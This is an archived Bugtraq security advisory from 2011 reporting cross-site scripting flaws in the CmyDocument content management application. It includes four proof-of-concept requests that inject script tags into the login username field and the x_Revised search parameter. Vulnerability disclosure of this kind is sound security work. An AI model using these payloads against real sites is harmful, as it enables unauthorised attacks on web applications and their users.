Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

CmyDocument Content Management Application - XSS Vulnerabilities

From: demonalex () 163 com
Date: Wed, 2 Nov 2011 23:02:02 GMT
Title: CmyDocument Content Management Application - XSS Vulnerabilities

Software : CmyDocument Content Management Application

Software Version : Unknown(version update : 2010-01-10)

Vendor: http://cmydocument.com/ 

Vulnerability Published : 2011-07-11

Vulnerability Update Time :

Status : 

Impact : Medium

Bug Description :
CmyDocument Content Management Application(version update : 2010-01-10, possibly earlier versions) is vulnerable to XSS.

Proof Of Concept :
1)username in login.asp,PoC:
POST http://192.168.10.202/login.asp
------------------------------------
username="><script>alert('demonalex')</script>&password=bbb&rememberme=a&submit=+++Login+++

2)username in login2.asp,PoC:
POST http://192.168.10.202/login2.asp
------------------------------------
username="><script>alert('demonalex')</script>&password=bbb&rememberme=a&submit=+++Login+++

3)x_Revised in myDoclist.asp,PoC:
http://192.168.10.202/myDoclist.asp?x_Title=a&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=info&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE

4)x_Revised in myWebDoclist.asp,PoC:
http://192.168.10.202/myWebDoclist.asp?x_Title=b&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=test&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
Pentester/Researcher
Dark2S Security Team/PolyU.HK
Previous By Date Next
Previous By Thread Next

Current thread: